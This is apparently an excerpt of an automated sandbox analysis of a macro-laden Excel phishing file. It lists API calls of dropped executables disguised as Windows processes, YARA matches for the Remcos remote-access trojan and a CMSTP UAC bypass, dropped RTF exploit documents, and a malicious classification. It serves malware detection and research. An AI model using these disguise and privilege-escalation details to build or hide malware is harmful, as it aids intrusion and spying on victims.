                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_00208638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00208638
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012C5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_012C5264
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A8633610_3_02A86336
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A7C0A110_3_02A7C0A1
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A5068710_3_02A50687
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A7270710_3_02A72707
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A7E75910_3_02A7E759
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A664FE10_3_02A664FE
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A6259010_3_02A62590
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A64A8010_3_02A64A80
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A70A0410_3_02A70A04
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A7CEF510_3_02A7CEF5
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A70EF810_3_02A70EF8
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A64CC010_3_02A64CC0
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A76C1310_3_02A76C13
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02AD720D10_3_02AD720D
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A5F24010_3_02A5F240
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A7B32610_3_02A7B326
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A7131010_3_02A71310
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A8903510_3_02A89035
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A7174510_3_02A71745
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A5D46010_3_02A5D460
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A6354010_3_02A63540
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A71B7A10_3_02A71B7A
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ACF86510_3_02ACF865
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A8585210_3_02A85852
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A819AE10_3_02A819AE
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02ACFCE210_3_02ACFCE2
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A5DC0010_3_02A5DC00
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A65C4110_3_02A65C41
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A85DC410_3_02A85DC4
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02AADD2810_3_02AADD28
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02AB7D3210_3_02AB7D32
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A87D0F10_3_02A87D0F
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001BE80010_2_001BE800
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001D330710_2_001D3307
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001DDAF510_2_001DDAF5
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001BFE4010_2_001BFE40
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001BE06010_2_001BE060
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001C414010_2_001C4140
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001D234510_2_001D2345
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0023046510_2_00230465
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001E645210_2_001E6452
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001E25AE10_2_001E25AE
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001D277A10_2_001D277A
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001C684110_2_001C6841
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_002308E210_2_002308E2
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0020E92810_2_0020E928
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001E890F10_2_001E890F
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021893210_2_00218932
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001C896810_2_001C8968
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001E69C410_2_001E69C4
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001DCCA110_2_001DCCA1
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001E6F3610_2_001E6F36
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0126E80011_2_0126E800
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128330711_2_01283307
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128DAF511_2_0128DAF5
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0126FE4011_2_0126FE40
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0127414011_2_01274140
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0126E06011_2_0126E060
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128234511_2_01282345
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012925AE11_2_012925AE
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012E046511_2_012E0465
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0129645211_2_01296452
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128277A11_2_0128277A
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012BE92811_2_012BE928
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012C893211_2_012C8932
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0129890F11_2_0129890F
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0127896811_2_01278968
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012969C411_2_012969C4
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0127684111_2_01276841
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012E08E211_2_012E08E2
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128CCA111_2_0128CCA1
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01296F3611_2_01296F36
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0127319011_2_01273190
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012770FE11_2_012770FE
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128F35911_2_0128F359
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0126128711_2_01261287
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128160411_2_01281604
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0127568011_2_01275680
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128781311_2_01287813
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012758C011_2_012758C0
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01281AF811_2_01281AF8
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01299C3511_2_01299C35
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128BF2611_2_0128BF26
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01281F1011_2_01281F10
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012E7E0D11_2_012E7E0D
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_000B362011_2_000B3620
                Source: PO-00006799868.xlsOLE indicator, VBA macros: true
                Source: ~WRF{8ACACCBE-F49B-438C-81AF-59EF5D64236E}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 01280C63 appears 70 times
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 01288A80 appears 42 times
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: String function: 01267F41 appears 35 times
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: String function: 02A77E80 appears 42 times
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: String function: 02A58E20 appears 32 times
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: String function: 02A58FF8 appears 32 times
                Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\96632497.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wecreatednewthigsforsuccessfulljournecyr________verynicepeoplesetirethigstogoformegreat________________nnicwaytoentreithigntochangewithmegreat[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: bhv35FF.tmp.13.drBinary or memory string: org.slneighbors
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@20/40@9/5
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021A0F4 GetLastError,FormatMessageW,10_2_0021A0F4
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_002084F3 AdjustTokenPrivileges,CloseHandle,10_2_002084F3
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_00208AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00208AA3
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012B84F3 AdjustTokenPrivileges,CloseHandle,11_2_012B84F3
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012B8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_012B8AA3
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CB3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,11_2_012CB3BF
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0022EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_0022EF21
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021C423 CoInitialize,CoCreateInstance,CoUninitialize,10_2_0021C423
